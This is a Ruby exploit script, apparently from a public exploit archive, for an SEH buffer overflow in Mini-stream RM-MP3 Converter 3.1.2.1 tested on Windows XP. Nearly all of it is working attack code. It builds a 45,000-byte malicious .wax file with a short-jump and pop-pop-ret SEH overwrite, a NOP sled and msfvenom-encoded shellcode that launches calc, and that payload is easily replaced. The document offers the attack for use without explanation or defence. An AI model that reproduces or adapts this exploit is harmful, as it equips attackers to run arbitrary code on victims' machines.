Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 (.wax) SEH Buffer Overflow

#!/usr/bin/env ruby

# Exploit Title: Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 (.wax) SEH Buffer Overflow

# Date: 26.11.2014

# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>

# Vendor Homepage: not valid anymore

# Software Link: not available

# Version: 3.1.2.1.2010.03.30

# Discovery: ZoRLu / zorlu@milw00rm.com

# Tested on: Microsoft Windows XP [Version 5.1.2600]

filename = "3-1-2-1-gb.wax"

seh = 43501

buff = "\x41" * 45000

nops = "\x90" * 16

# ./msfvenom -p windows/exec CMD=calc EXITFUNC=thread -b "\x00\x0a\x0d\x0c\x20" -e x86/shikata_ga_nai -f ruby

sc =

"\xbe\x97\xd4\x64\xe7\xda\xdf\xd9\x74\x24\xf4\x5a\x33\xc9" +

"\xb1\x32\x83\xc2\x04\x31\x72\x0e\x03\xe5\xda\x86\x12\xf5" +

"\x0b\xcf\xdd\x05\xcc\xb0\x54\xe0\xfd\xe2\x03\x61\xaf\x32" +

"\x47\x27\x5c\xb8\x05\xd3\xd7\xcc\x81\xd4\x50\x7a\xf4\xdb" +

"\x61\x4a\x38\xb7\xa2\xcc\xc4\xc5\xf6\x2e\xf4\x06\x0b\x2e" +

"\x31\x7a\xe4\x62\xea\xf1\x57\x93\x9f\x47\x64\x92\x4f\xcc" +

"\xd4\xec\xea\x12\xa0\x46\xf4\x42\x19\xdc\xbe\x7a\x11\xba" +

"\x1e\x7b\xf6\xd8\x63\x32\x73\x2a\x17\xc5\x55\x62\xd8\xf4" +

"\x99\x29\xe7\x39\x14\x33\x2f\xfd\xc7\x46\x5b\xfe\x7a\x51" +

"\x98\x7d\xa1\xd4\x3d\x25\x22\x4e\xe6\xd4\xe7\x09\x6d\xda" +

"\x4c\x5d\x29\xfe\x53\xb2\x41\xfa\xd8\x35\x86\x8b\x9b\x11" +

"\x02\xd0\x78\x3b\x13\xbc\x2f\x44\x43\x18\x8f\xe0\x0f\x8a" +

"\xc4\x93\x4d\xc0\x1b\x11\xe8\xad\x1c\x29\xf3\x9d\x74\x18" +

"\x78\x72\x02\xa5\xab\x37\xec\x47\x7e\x4d\x85\xd1\xeb\xec" +

"\xc8\xe1\xc1\x32\xf5\x61\xe0\xca\x02\x79\x81\xcf\x4f\x3d" +

"\x79\xbd\xc0\xa8\x7d\x12\xe0\xf8\x1d\xf5\x72\x60\xe2"

buff[seh-4,4] = "\xeb\x0e\x90\x90"

buff[seh,4] = [0x10031659].pack("V").force_encoding("utf-8")

buff[seh+4,nops.size] = nops

buff[seh+(4+nops.size),sc.size] = sc

File.open(filename,"wb") do |fp|

fp.write(buff)

fp.close

puts "Exploit file created: #{filename} size: #{buff.size}"

end